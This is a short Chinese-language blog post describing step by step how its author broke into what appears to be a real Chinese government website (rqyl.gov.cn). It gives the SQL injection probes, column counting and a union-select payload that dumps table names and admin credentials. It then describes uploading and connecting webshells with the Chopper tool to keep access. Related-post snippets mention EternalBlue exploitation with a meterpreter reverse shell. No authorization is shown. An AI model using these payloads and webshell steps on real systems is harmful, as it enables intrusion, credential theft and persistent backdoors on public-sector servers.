一次完整較為滲透過程

2022-07-29 12:15:09 字數 1695 閱讀 3496

步驟一:

利用阿d瀏覽器通過https:  注入關鍵字掃瞄發現注入點:

用啊d跑不出賬號密碼 

步驟二:

手工注入 and 1=1 、and1=2出錯

猜欄位   order by 17

查詢錯段 

version() 查詢資料庫版本

user() 查詢當前使用者

database()檢視資料庫名

@@version_compile_os 檢視伺服器系統

爆出資料庫中所有表

www.rqyl.gov.cn/*****.php?id=-153  union select 1, group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17   

from information_schema.tables where table_schema=0x67313838343638---資料庫轉為十六進製制

爆出admin裡面的內容:

用工具找後台登陸  上傳小馬 找到小馬的上傳位址  用菜刀連線

在存放網頁檔案php 處新建檔案  把大馬考進來

宣告:

安全 一次滲透測試完整流程

常規滲透測試流程 思維導圖 web安全滲透測試不是隨便拿個工具掃一下就可以做的,要了解業務還需要給出解決方案。滲透測試 出於保護系統的目的,更全面地找出測試物件的安全隱患。入侵 不擇手段地 甚至具有破壞性的 拿到系統許可權。明確目標 資訊收集 漏洞探測 漏洞驗證 資訊分析 獲取所需 資訊整理 形成報...

一次完整請求的過程

知其然,知其所以然,不止於知其所以用。瀏覽器和服務端的傳輸 伺服器以tomcat為例 q 過濾器 和 的使用,原理,生命週期。q servlet的匹配對映順序 load on startup可指定匹配順序,其他根據url pattern的路徑匹配規則決定優先順序 注意servlet和filter的匹...

1 (資訊收集)記錄一次使用永恆之藍的滲透過程

一 通過nmap掃瞄得知目標機開放了445埠,執行的操作版本為win7 使用windows x64 meterpreter reverse tcp payload 設定好各項引數 成功進入meterperter工具 使用getpid獲取meterpreter shell的程序號 繼續使用ps檢視本機...